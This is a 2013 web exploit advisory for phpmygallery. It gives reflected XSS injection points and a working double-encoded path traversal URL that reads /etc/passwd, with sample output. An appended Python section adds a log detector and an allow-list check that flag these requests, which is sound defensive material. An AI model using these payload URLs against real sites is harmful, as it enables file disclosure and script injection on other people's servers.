####################################################################################
#    __                   .__                                 .__                  #
#   |__|  _____     ____  |__|  ______  ___________   _______ |__|  ____    ______ #
#   |  |  \__  \   /    \ |  | /  ___/ /  ___/\__  \  \_  __ \|  |_/ __ \  /  ___/ #
#   |  |   / __ \_|   |  \|  | \___ \  \___ \  / __ \_ |  | \/|  |\  ___/  \___ \  #
# /\__|   (____  /|___|  /|__|/____  >/____  >(____  / |__|   |__| \___  >/____  > #
# \______|     \/     \/           \/      \/      \/                  \/      \/  #
#                              www.janissaries.org                                 #
##================================================================================##

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
«««:»»» Phpmygallery - Multiple Vulnerabilities All Version «««:»»»
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
./Title Exploit    : Phpmygallery - Multiple Vulnerabilities All Version
./WebApps URL      : http://phpmygallery.kapierich.net
./WebApps Download : http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.51.010.zip
./Scripts Version  : 1.51.010 & All version
./Author Exploit   : [ TheMirkin ] [ th3mirkin@gmail.com ] [ All Janissaries ]
./Security Risk    : [ High Level ]
./Category XPL     : [ WebApps ]
./Date             : 21.02.2013
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#################################################################################
#_____________________________________________________#
#[~] Xss on
#   /_conf/?action=statistics&filename=[Code]
#   /_conf/?action=delsettings&group=[Code]
#   /_conf/?action=mainsetup&group=&picdir=[Code]
###Demo Exploit
# http://www.target.com/_conf/?action=statistics&filename=2011.10">>

TheMirkin

# http://www.target.com/_conf/?action=delsettings&group=">>

TheMirkin

#_____________________________________________________#
#[~] Path Vulnerabilities ON
#   /_conf/?action=delsettings&group=[Code]%2500.jpg&picdir=Sample_Gallery&what=descriptions
####Demo Exploit
# http://www.target.com/_conf/?action=delsettings&group=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg&picdir=Sample_Gallery&what=descriptions
#_____________________________________________________
#
# root:x:0:0:root:/root:/bin/bash
# bin:x:1:1:bin:/bin:/bin/false
# daemon:x:2:2:daemon:/sbin:/bin/false
# adm:x:3:4:adm:/var/adm:/bin/false
# lp:x:4:7:lp:/var/spool/lpd:/bin/false
# sync:x:5:0:sync:/sbin:/bin/sync
#_____________________________________________________#
# xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[ Thanks For All ]xxxxxxxxxxxxxxxxxxxxxxxxxxxxx
#
# Special Thanks : Burtay and All Janissaries Team(Burtay,B127Y,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy)
#################################################################################
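Both issue classes in this advisory leave a recognisable trace in a web server's access log: the reflected XSS cases carry raw `"` and `>` characters in the `filename`/`group`/`picdir` parameters of `/_conf/`, and the traversal case depends on the application decoding the `group` value a second time (so `%252F` becomes `/` and `%2500` becomes a null byte that truncates the `.jpg` suffix). The script below is an added example, not code from the advisory or from phpmygallery: it decodes each query parameter until the value stops changing, counts how many rounds that took, and flags double-encoding, null bytes, `../` sequences and markup characters. It also shows the allow-list check a patched application could apply to gallery names. The log lines, the IP addresses and the `GALLERY_NAME` allow-list pattern are constructed assumptions for the demo, not observed traffic or the project's own validation rule.

```python
"""Detection helper for the phpmygallery /_conf/ XSS and double-encoded traversal
requests described in the advisory. Added example; log lines are constructed."""
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (combined-log style, shortened). Not real traffic.
# Line 2 mirrors the advisory's XSS probe (">TheMirkin), line 3 its traversal request.
SAMPLE_LOG = """\
203.0.113.10 - - [21/Feb/2013:10:00:01 +0000] "GET /_conf/?action=statistics&filename=2011.10 HTTP/1.1" 200 512
203.0.113.11 - - [21/Feb/2013:10:00:02 +0000] "GET /_conf/?action=statistics&filename=2011.10%22%3ETheMirkin HTTP/1.1" 200 530
203.0.113.12 - - [21/Feb/2013:10:00:03 +0000] "GET /_conf/?action=delsettings&group=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg&picdir=Sample_Gallery&what=descriptions HTTP/1.1" 200 1900
203.0.113.13 - - [21/Feb/2013:10:00:04 +0000] "GET /_conf/?action=mainsetup&group=&picdir=Sample_Gallery HTTP/1.1" 200 480
"""

# Assumed allow-list for gallery/picture names; adjust to what the application needs.
GALLERY_NAME = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def fully_decode(value, max_rounds=5):
    """Undo nested percent-encoding until the value stops changing.
    Returns (decoded_value, rounds); rounds >= 2 means the value was double-encoded."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
        rounds += 1
    return value, rounds


def parse_request_line(line):
    """Return (method, target) from the quoted "METHOD TARGET PROTO" token of a log line.
    Raises ValueError for lines that do not carry such a token."""
    start = line.index('"') + 1
    end = line.index('"', start)
    method, target, _proto = line[start:end].split(" ", 2)
    return method, target


def analyse_target(target):
    """Return a list of finding strings for one request target (empty if nothing suspicious).
    Only /_conf/ requests are inspected, matching the paths named in the advisory."""
    findings = []
    parts = urlsplit(target)
    if not parts.path.startswith("/_conf/"):
        return findings
    for pair in parts.query.split("&"):
        if not pair:
            continue
        name, _, raw = pair.partition("=")
        decoded, rounds = fully_decode(raw)
        if rounds >= 2:
            findings.append(f"{name}: double-encoded value")
        if "\x00" in decoded:
            findings.append(f"{name}: null byte")
        if "../" in decoded or "..\\" in decoded:
            findings.append(f"{name}: path traversal")
        if name in ("filename", "group", "picdir") and any(c in decoded for c in '<>"'):
            findings.append(f"{name}: markup characters (possible reflected XSS)")
    return findings


def scan_log(text):
    """Run analyse_target over every line; return {line_number: findings} for hits only."""
    hits = {}
    for number, line in enumerate(text.splitlines(), 1):
        try:
            _method, target = parse_request_line(line)
        except ValueError:
            continue  # malformed or non-request line, skip it
        findings = analyse_target(target)
        if findings:
            hits[number] = findings
    return hits


def is_safe_gallery_name(value):
    """Server-side allow-list check a patched handler could apply to group/picdir/filename:
    decode fully first so a double-encoded separator cannot slip past the pattern."""
    decoded, _ = fully_decode(value)
    return bool(GALLERY_NAME.fullmatch(decoded)) and ".." not in decoded


if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG).items():
        print(f"line {number}: {'; '.join(findings)}")
```

Decoding until the value is stable, rather than exactly once, is the point of the example: a single decode of the advisory's `group` value still looks like `..%2F..%2F...%00.jpg`, which contains neither `/` nor a null byte, so a rule that inspects the once-decoded query misses it. The same `fully_decode` is reused on the validation side, so the allow-list sees the same bytes the file system would.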